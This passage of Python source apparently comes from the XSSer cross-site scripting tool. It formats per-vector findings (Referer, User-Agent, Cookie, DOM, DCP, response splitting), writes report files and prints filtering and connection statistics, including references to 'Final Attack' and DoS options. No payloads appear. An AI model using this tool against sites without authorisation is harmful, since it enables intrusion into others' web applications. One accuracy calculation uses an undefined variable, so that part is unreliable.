  2830. attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
  2831. if line[2] == "XSR":
  2832. self.xsr_found = self.xsr_found + 1
  2833. if len(self.hash_found) < 11:
  2834. if line[4]: # when query string
  2835. self.report("[+] Target:", line[6] + " | " + line[4])
  2836. else:
  2837. self.report("[+] Target:", line[6])
  2838. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2839. self.report("[!] Method: Referer Injection")
  2840. self.report("[*] Hash:", line[3])
  2841. self.report("[*] Payload:", str(Curl.referer))
  2842. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2843. if self.options.fileoutput:
  2844. fout.write("="*75)
  2845. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2846. fout.write("="*75 + "\n\n")
  2847. for h in self.hash_found:
  2848. if h[2] == "XSR":
  2849. if h[4]:
  2850. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2851. else:
  2852. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2853. fout.write("="*75 + "\n\n")
  2854. elif line[2] == "XSA":
  2855. self.xsa_found = self.xsa_found + 1
  2856. if len(self.hash_found) < 11:
  2857. if line[4]: # when query string
  2858. self.report("[+] Target:", line[6] + " | " + line[4])
  2859. else:
  2860. self.report("[+] Target:", line[6])
  2861. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2862. self.report("[!] Method: User-Agent Injection")
  2863. self.report("[*] Hash:", line[3])
  2864. self.report("[*] Payload:", str(Curl.agent))
  2865. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2866. if self.options.fileoutput:
  2867. fout.write("="*75)
  2868. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2869. fout.write("="*75 + "\n\n")
  2870. for h in self.hash_found:
  2871. if h[2] == "XSA":
  2872. if h[4]:
  2873. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2874. else:
  2875. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2876. fout.write("="*75 + "\n\n")
  2877. elif line[2] == "COO":
  2878. self.coo_found = self.coo_found + 1
  2879. if len(self.hash_found) < 11:
  2880. if line[4]: # when query string
  2881. self.report("[+] Target:", line[6] + " | " + line[4])
  2882. else:
  2883. self.report("[+] Target:", line[6])
  2884. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2885. self.report("[!] Method: Cookie Injection")
  2886. self.report("[*] Hash:", line[3])
  2887. self.report("[*] Payload:", str(Curl.cookie))
  2888. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2889. if self.options.fileoutput:
  2890. fout.write("="*75)
  2891. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2892. fout.write("="*75 + "\n\n")
  2893. for h in self.hash_found:
  2894. if h[2] == "COO":
  2895. if h[4]:
  2896. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2897. else:
  2898. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  2899. fout.write("="*75 + "\n\n")
  2900. elif line[1] == "[Data Control Protocol Injection]":
  2901. self.dcp_found = self.dcp_found + 1
  2902. if len(self.hash_found) < 11:
  2903. if line[4]: # when query string
  2904. self.report("[+] Target:", line[6] + " | " + line[4])
  2905. else:
  2906. self.report("[+] Target:", line[6])
  2907. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2908. self.report("[!] Method: DCP")
  2909. self.report("[*] Hash:", line[3])
  2910. self.report("[*] Payload:", line[0])
  2911. self.report("[!] Vulnerable: DCP (Data Control Protocol)")
  2912. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2913. self.report("[*] Final Attack:", attack_url)
  2914. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2915. if self.options.fileoutput:
  2916. fout.write("="*75)
  2917. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2918. fout.write("="*75 + "\n\n")
  2919. for h in self.hash_found:
  2920. if h[4]:
  2921. if h[1] == "[Data Control Protocol Injection]":
  2922. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2923. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2924. else:
  2925. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2926. else:
  2927. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2928. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2929. else:
  2930. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2931. fout.write("="*75 + "\n\n")
  2932. elif line[1] == "[Document Object Model Injection]":
  2933. self.dom_found = self.dom_found + 1
  2934. if len(self.hash_found) < 11:
  2935. if line[4]: # when query string
  2936. self.report("[+] Target:", line[6] + " | " + line[4])
  2937. else:
  2938. self.report("[+] Target:", line[6])
  2939. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2940. self.report("[!] Method: DOM")
  2941. self.report("[*] Hash:", line[3])
  2942. self.report("[*] Payload:", line[0])
  2943. self.report("[!] Vulnerable: DOM (Document Object Model)")
  2944. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2945. self.report("[*] Final Attack:", attack_url)
  2946. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2947. if self.options.fileoutput:
  2948. fout.write("="*75)
  2949. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2950. fout.write("="*75 + "\n\n")
  2951. for h in self.hash_found:
  2952. if h[1] == "[Document Object Model Injection]":
  2953. if h[4]:
  2954. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2955. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2956. else:
  2957. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2958. else:
  2959. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2960. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2961. else:
  2962. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DOM" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DOM (Document Object Model)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2963. fout.write("="*75 + "\n\n")
  2964. elif line[1] == "[Induced Injection]":
  2965. self.httpsr_found = self.httpsr_found +1
  2966. if len(self.hash_found) < 11:
  2967. if line[4]: # when query string
  2968. self.report("[+] Target:", line[6] + " | " + line[4])
  2969. else:
  2970. self.report("[+] Target:", line[6])
  2971. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  2972. self.report("[!] Method: INDUCED")
  2973. self.report("[*] Hash:", line[3])
  2974. self.report("[*] Payload:", line[0])
  2975. self.report("[!] Vulnerable: HTTPsr ( HTTP Splitting Response)")
  2976. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2977. self.report("[*] Final Attack:", attack_url)
  2978. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  2979. if self.options.fileoutput:
  2980. fout.write("="*75)
  2981. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  2982. fout.write("="*75 + "\n\n")
  2983. for h in self.hash_found:
  2984. if h[4]:
  2985. if h[1] == "[Induced Injection]":
  2986. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2987. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2988. else:
  2989. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2990. else:
  2991. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  2992. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  2993. else:
  2994. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: INDUCED" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "HTTPsr ( HTTP Splitting Response)" + "\n\n[!] Status: XSS FOUND!\n\n")
  2995. fout.write("="*75 + "\n\n")
  2996. elif line[1] == "[hashing check]":
  2997. if len(self.hash_found) < 11:
  2998. if line[4]:
  2999. self.report("[+] Target:", line[6] + " | " + line[4])
  3000. else:
  3001. self.report("[+] Target:", line[6])
  3002. self.report("[+] Vector: [ " + str(line[3]) + " ]")
  3003. self.report("[!] Method:", line[2])
  3004. self.report("[*] Payload:", line[5])
  3005. self.report("[!] Status: HASH FOUND!", "\n", '-'*50, "\n")
  3006. if self.options.fileoutput:
  3007. fout.write("="*75)
  3008. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3009. fout.write("="*75 + "\n\n")
  3010. for h in self.hash_found:
  3011. if h[1] == "[hashing check]":
  3012. if h[4]:
  3013. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
  3014. else:
  3015. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: hashing check" + " \n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status: HASH FOUND!\n\n")
  3016. fout.write("="*75 + "\n\n")
  3017. elif line[1] == "[manual_injection]":
  3018. self.manual_found = self.manual_found + 1
  3019. if len(self.hash_found) < 11:
  3020. if line[4]: # when query string
  3021. self.report("[+] Target:", line[6] + " | " + line[4])
  3022. else:
  3023. self.report("[+] Target:", line[6])
  3024. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3025. self.report("[!] Method: MANUAL")
  3026. self.report("[*] Hash:", line[3])
  3027. self.report("[*] Payload:", line[0])
  3028. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3029. self.report("[*] Final Attack:", attack_url)
  3030. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3031. if self.options.fileoutput:
  3032. fout.write("="*75)
  3033. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3034. fout.write("="*75 + "\n\n")
  3035. for line in self.hash_found:
  3036. if line[4]:
  3037. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3038. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3039. else:
  3040. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3041. else:
  3042. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3043. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3044. else:
  3045. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND!\n\n")
  3046. fout.write("="*75 + "\n\n")
  3047. elif line[1] == "[Heuristic test]":
  3048. if len(self.hash_found) < 11:
  3049. if line[4]:
  3050. self.report("[+] Target:", line[6] + " | " + line[4])
  3051. else:
  3052. self.report("[+] Target:", line[6])
  3053. self.report("[+] Vector: [ " + str(line[3]) + " ]")
  3054. self.report("[!] Method:", line[2])
  3055. self.report("[*] Payload:", line[5])
  3056. self.report("[!] Status: NOT FILTERED!", "\n", '-'*50, "\n")
  3057. if self.options.fileoutput:
  3058. fout.write("="*75)
  3059. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3060. fout.write("="*75 + "\n\n")
  3061. for line in self.hash_found:
  3062. if line[4]:
  3063. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
  3064. else:
  3065. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
  3066. fout.write("="*75 + "\n\n")
  3067. else:
  3068. self.auto_found = self.auto_found + 1
  3069. if len(self.hash_found) < 11:
  3070. if line[4]: # when query string
  3071. self.report("[+] Target:", line[6] + " | " + line[4])
  3072. else:
  3073. self.report("[+] Target:", line[6])
  3074. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3075. self.report("[!] Method: URL")
  3076. self.report("[*] Hash:", line[3])
  3077. self.report("[*] Payload:", line[0])
  3078. self.report("[!] Vulnerable:", line[1])
  3079. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3080. self.report("[*] Final Attack:", attack_url)
  3081. self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n")
  3082. if self.options.fileoutput:
  3083. fout.write("="*75)
  3084. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3085. fout.write("="*75 + "\n\n")
  3086. for line in self.hash_found:
  3087. if line[4]:
  3088. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3089. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3090. else:
  3091. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3092. else:
  3093. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3094. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3095. else:
  3096. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3097. fout.write("="*75 + "\n\n")
  3098. if self.options.fileoutput:
  3099. fout.close()
  3100. if self.options.fileoutput and not self.options.filexml:
  3101. self.report("[Info] Generating report: [ XSSreport.raw ]\n")
  3102. self.report("-"*25+"\n")
  3103. if self.options.fileoutput and self.options.filexml:
  3104. self.report("[Info] Generating report: [ XSSreport.raw ] | Exporting results to: [ " + str(self.options.filexml) + " ] \n")
  3105. self.report("-"*25+"\n")
  3106. if len(self.hash_found) > 10 and not self.options.fileoutput: # write results fo file when large output (white magic!)
  3107. if not self.options.filexml:
  3108. self.report("[Info] Aborting large screen output. Generating report: [ XSSreport.raw ]\n")
  3109. self.report("-"*25+"\n")
  3110. fout = open("XSSreport.raw", "w") # write better than append
  3111. fout.write("="*75)
  3112. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3113. fout.write("="*75 + "\n\n")
  3114. for line in self.hash_found:
  3115. if line[4]:
  3116. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3117. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3118. else:
  3119. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3120. else:
  3121. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3122. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3123. else:
  3124. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3125. fout.write("="*75 + "\n\n")
  3126. fout.close()
  3127. else:
  3128. self.report("[Info] Exporting results to: [ " + str(self.options.filexml) + " ]\n")
  3129. self.report("-"*25+"\n")
  3130. # heuristic always with statistics
  3131. if self.options.heuristic:
  3132. heuris_semicolon_total_found = self.heuris_semicolon_found + self.heuris_une_semicolon_found + self.heuris_dec_semicolon_found
  3133. heuris_backslash_total_found = self.heuris_backslash_found + self.heuris_une_backslash_found + self.heuris_dec_backslash_found
  3134. heuris_slash_total_found = self.heuris_slash_found + self.heuris_une_slash_found + self.heuris_dec_slash_found
  3135. heuris_minor_total_found = self.heuris_minor_found + self.heuris_une_minor_found + self.heuris_dec_minor_found
  3136. heuris_mayor_total_found = self.heuris_mayor_found + self.heuris_une_mayor_found + self.heuris_dec_mayor_found
  3137. heuris_doublecolon_total_found = self.heuris_doublecolon_found + self.heuris_une_doublecolon_found + self.heuris_dec_doublecolon_found
  3138. heuris_colon_total_found = self.heuris_colon_found + self.heuris_une_colon_found + self.heuris_dec_colon_found
  3139. heuris_equal_total_found = self.heuris_equal_found + self.heuris_une_equal_found + self.heuris_dec_equal_found
  3140. total_heuris_found = heuris_semicolon_total_found + heuris_backslash_total_found + heuris_slash_total_found + heuris_minor_total_found + heuris_mayor_total_found + heuris_doublecolon_total_found + heuris_colon_total_found + heuris_equal_total_found
  3141. total_heuris_params = total_heuris_found + self.heuris_semicolon_found + self.heuris_backslash_found + self.heuris_slash_found + self.heuris_minor_found + self.heuris_mayor_found + self.heuris_doublecolon_found + self.heuris_colon_found + self.heuris_equal_found
  3142. total_heuris_notfound = self.heuris_semicolon_notfound + self.heuris_backslash_notfound + self.heuris_slash_notfound + self.heuris_minor_notfound + self.heuris_mayor_notfound + self.heuris_doublecolon_notfound + self.heuris_colon_notfound + self.heuris_equal_notfound
  3143. if total_heuris_notfound > 0: # not shown when not found
  3144. self.options.statistics = True
  3145. # some statistics reports
  3146. if self.options.statistics:
  3147. # heuristic test results
  3148. if self.options.heuristic:
  3149. self.report("\n"+'='*75)
  3150. self.report("[+] Heuristics:")
  3151. self.report('='*75)
  3152. test_time = datetime.datetime.now() - self.time
  3153. self.report("\n" + '-'*50)
  3154. self.report("Test Time Duration: ", test_time)
  3155. self.report('-'*50 )
  3156. total_connections = total_heuris_found + total_heuris_notfound
  3157. self.report("Total fuzzed:", total_connections)
  3158. self.report('-'*75)
  3159. self.report(' ', " <FILTERED!>", " <NOT FILTERED!>", " =" , " ASCII", "+", "UNE/HEX", "+", "DEC")
  3160. # semicolon results
  3161. self.report('; ', " ", self.heuris_semicolon_notfound, " ",
  3162. heuris_semicolon_total_found, " ",
  3163. self.heuris_semicolon_found, " ",
  3164. self.heuris_une_semicolon_found, " ",
  3165. self.heuris_dec_semicolon_found)
  3166. # backslash results
  3167. self.report('\\ ', " ", self.heuris_backslash_notfound, " ",
  3168. heuris_backslash_total_found, " ",
  3169. self.heuris_backslash_found, " ",
  3170. self.heuris_une_backslash_found, " ",
  3171. self.heuris_dec_backslash_found)
  3172. # slash results
  3173. self.report("/ ", " ", self.heuris_slash_notfound, " ",
  3174. heuris_slash_total_found, " ",
  3175. self.heuris_slash_found, " ",
  3176. self.heuris_une_slash_found, " ",
  3177. self.heuris_dec_slash_found)
  3178. # minor results
  3179. self.report("< ", " ", self.heuris_minor_notfound, " ",
  3180. heuris_minor_total_found, " ",
  3181. self.heuris_minor_found, " ",
  3182. self.heuris_une_minor_found, " ",
  3183. self.heuris_dec_minor_found)
  3184. # mayor results
  3185. self.report("> ", " ", self.heuris_mayor_notfound, " ",
  3186. heuris_mayor_total_found, " ",
  3187. self.heuris_mayor_found, " ",
  3188. self.heuris_une_mayor_found, " ",
  3189. self.heuris_dec_mayor_found)
  3190. # doublecolon results
  3191. self.report('" ', " ", self.heuris_doublecolon_notfound, " ",
  3192. heuris_doublecolon_total_found, " ",
  3193. self.heuris_doublecolon_found, " ",
  3194. self.heuris_une_doublecolon_found, " ",
  3195. self.heuris_dec_doublecolon_found)
  3196. # colon results
  3197. self.report("' ", " ", self.heuris_colon_notfound, " ",
  3198. heuris_colon_total_found, " ",
  3199. self.heuris_colon_found, " ",
  3200. self.heuris_une_colon_found, " ",
  3201. self.heuris_dec_colon_found)
  3202. # equal results
  3203. self.report("= ", " ", self.heuris_equal_notfound, " ",
  3204. heuris_equal_total_found, " ",
  3205. self.heuris_equal_found, " ",
  3206. self.heuris_une_equal_found, " ",
  3207. self.heuris_dec_equal_found)
  3208. self.report('-'*75)
  3209. try:
  3210. _accur = total_heuris_found * 100 / total_heuris_params
  3211. except ZeroDivisionError:
  3212. _accur = 0
  3213. self.report('Target(s) Filtering Accur: %s %%' % _accur)
  3214. self.report('-'*75)
  3215. # statistics block
  3216. if len(self.hash_found) + len(self.hash_notfound) == 0:
  3217. pass
  3218. if self.options.heuristic:
  3219. pass
  3220. else:
  3221. self.report('='*75)
  3222. self.report("[+] Statistics:")
  3223. self.report('='*75)
  3224. test_time = datetime.datetime.now() - self.time
  3225. self.report("\n" + '-'*50)
  3226. self.report("Test Time Duration: ", test_time)
  3227. self.report('-'*50 )
  3228. total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
  3229. self.report("Total Connections:", total_connections)
  3230. self.report('-'*25)
  3231. self.report("200-OK:" , self.success_connection , "|", "404:" ,
  3232. self.not_connection , "|" , "503:" ,
  3233. self.forwarded_connection , "|" , "Others:",
  3234. self.other_connection)
  3235. try:
  3236. _accur = self.success_connection * 100 / total_connections
  3237. except ZeroDivisionError:
  3238. _accur = 0
  3239. self.report("Connec: %s %%" % _accur)
  3240. self.report('-'*50)
  3241. total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection
  3242. self.report("Total Payloads:", total_payloads)
  3243. self.report('-'*25)
  3244. self.report("Checker:", self.check_positives, "|", "Manual:",
  3245. self.manual_injection, "|" , "Auto:" ,
  3246. self.auto_injection ,"|", "DCP:",
  3247. self.dcp_injection, "|", "DOM:", self.dom_injection,
  3248. "|", "Induced:", self.httpsr_injection, "|" , "XSR:",
  3249. self.xsr_injection, "|", "XSA:",
  3250. self.xsa_injection , "|", "COO:",
  3251. self.coo_injection)
  3252. self.report('-'*50)
  3253. self.report("Total Injections:" ,
  3254. len(self.hash_notfound) + len(self.hash_found))
  3255. self.report('-'*25)
  3256. self.report("Failed:" , len(self.hash_notfound), "|",
  3257. "Successful:" , len(self.hash_found))
  3258. try:
  3259. _accur = len(self.hash_found) * 100 / total_injections
  3260. except ZeroDivisionError:
  3261. _accur = 0
  3262. self.report("Accur : %s %%" % _accur)
  3263. self.report("\n" + '='*50)
  3264. total_discovered = self.false_positives + self.manual_found + self.auto_found + self.dcp_found + self.dom_found + self.xsr_found + self.xsa_found + self.coo_found
